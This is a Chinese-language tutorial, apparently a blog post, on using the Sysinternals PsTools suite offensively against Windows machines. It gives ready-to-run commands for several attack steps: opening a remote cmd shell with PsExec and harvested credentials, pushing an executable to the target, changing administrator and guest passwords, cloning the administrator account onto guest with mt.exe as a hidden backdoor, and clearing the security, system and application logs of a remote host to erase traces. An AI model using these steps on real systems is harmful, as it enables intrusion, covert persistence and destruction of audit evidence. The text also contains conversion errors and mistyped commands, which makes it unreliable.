Pstools使用

pstool的介紹

PsTools是Sysinternals Suite中一款排名靠前的一個安全管理工具套件。如今被微軟收購。目前pstools中含有12款各式各樣的小工具。若是將它們靈活的運用，將會在滲透中收到奇效。全部的pstool第一次運行時都會彈框。能夠用–accepteula這個參數繞過。

還有全部的pstool都支持IP$，一旦IP$共享是鏈接的就不用輸入-u 和-p這兩個參數。

如何創建IP$鏈接。命令以下：

Net user \\目標ip\ 密碼 /user:用戶

Net user \\192.168.1.3\ 123456 /user:test

創建後全部的ps工具都將能夠不用輸入用戶和密碼了。

其中12款工具簡介以下：

◆PsExec - 遠程執行進程

◆PsFile - 顯示遠程打開的文件

◆PsGetSid - 顯示計算機或用戶的 SID

◆PsInfo - 列出有關係統的信息

◆PsKill - 按名稱或進程 ID 終止進程

◆PsList - 列出有關進程的詳細信息

◆PsLoggedOn - 查看在本地經過資源共享（包含全部資源）登陸的用戶

◆PsLogList - 轉儲事件日誌記錄

◆PsPasswd － 更改賬戶密碼

◆PsService - 查看和控制服務

◆PsShutdown - 關閉並從新啓動（可選）計算機

◆PsSuspend - 暫停進程

 Psexec 介紹

遠程獲取一個cmdshell

好比我再滲透中掃描到目標機（192.168.1.3）的一個用戶名（test）和密碼（123456）。

那咱們的命令就是：

psexec \\目標ip -u 用戶名 -p 密碼 進程名

psexec \\192.168.0.109 –u test –p 123456 cmd.exe
exit退出

 

這裏看見不能空密碼進行鏈接

 

 

 

限制 比guest權限大的用戶都能登錄

 PsExec \\192.168.0.109 -u administrator -p 123456 -c k:\ss.exe

 

 

 

 

pspasswd的應用詳解

 

 

pspasswd \\192.168.0.109 -u administrator -p 123456 guest 123456  用administrator改guest的密碼

 

 

 

pspassword妙用

首先執行D:\web|pspasswd.exe –accepteula （第一次執行，表示許可執行的意思）

D:\web|pspasswd.exe administrator yueyan

就會成功修改administrator的密碼。

這裏能修改密碼的緣由是pspasswd不是調用net.exe進行密碼修改。

上述介紹經常配合mt.exe進行用戶克隆。這裏簡單介紹：

（關於mt.exe的詳細介紹請訪問：【工具】mt.exe的詳細介紹）
首先mt.exe查看用戶sid，比較後看是否有克隆帳戶

Mt -chkuser

比較後，沒有克隆帳戶，咱們選擇guest這個帳戶進行克隆：

Mt –clone administrator guest

而後配合pspasswd修改密碼：

Pspasswd guest yueyan

就這樣成功克隆一個帳戶，並能成功登錄訪問。

pskill+psinfo+pslist的應用詳解

pskill \\192.168.0.109 -u administrator -p 123456 cmd.exe

 

我再介紹psinfo的相關應用。

基本參數是：

-h 顯示已經安裝的補丁信息

-s 顯示已安裝的軟件信息

-d 顯示磁盤信息

若是咱們想看遠程主機的基本信息，命令以下：

psinfo –h –s –d \\192.168.1.3 –u administrator –p 123456

 

PSLOGGEDON：查看指定計算機的本地及遠程登陸的用戶和登陸時間。必須創建在IP$共享下才可使用這個工具。

其餘ps工具介紹：

PSLOGGEDON：查看指定計算機的本地及遠程登陸的用戶和登陸時間。必須創建在IP$共享下才可使用這個工具。

命令以下：

Psloggedon –l \\192.168.1.3

PSLOGLIST：事件日誌轉儲及管理。

這個對於滲透測試是很是有用的，它最大的特色就是遠程清理系統日誌。

經常使用：

psloglist \\72.56.17.74 application -c > nul

psloglist \\72.56.17.74 system -c > nul

psloglist \\72.56.17.74 security -c > nul

分別是清理應用程序日誌，系統運行日誌，安全日誌。

PSSERVICE：管理服務。

經常使用：

psservice query messenger

查詢messenger服務的相關信息。

最重要的項目是：服務名稱、顯示名稱、服務描述、服務類型、服務狀態。

psservice config messenger

查詢服務的配置信息。

最重要的項目是：服務名稱、服務描述、服務類型、服務啓動類型、服務錯誤控制級別、可執行文件的路徑等等。

PSSHUTDOWN：關機工具。

經常使用命令：

Psshutdown –s –t 60

60秒後關機。

下面幾個不經常使用，就介紹下：

PsFile - 顯示遠程打開的文件

Psfile \\192.168.1.3

PsGetSid - 顯示計算機或用戶的 SID

Psgetsid \\192.168.1.3

PsSuspend - 暫停進程

Pssuspend \\192.168.1.3 –u test –p 123456 cmd,exe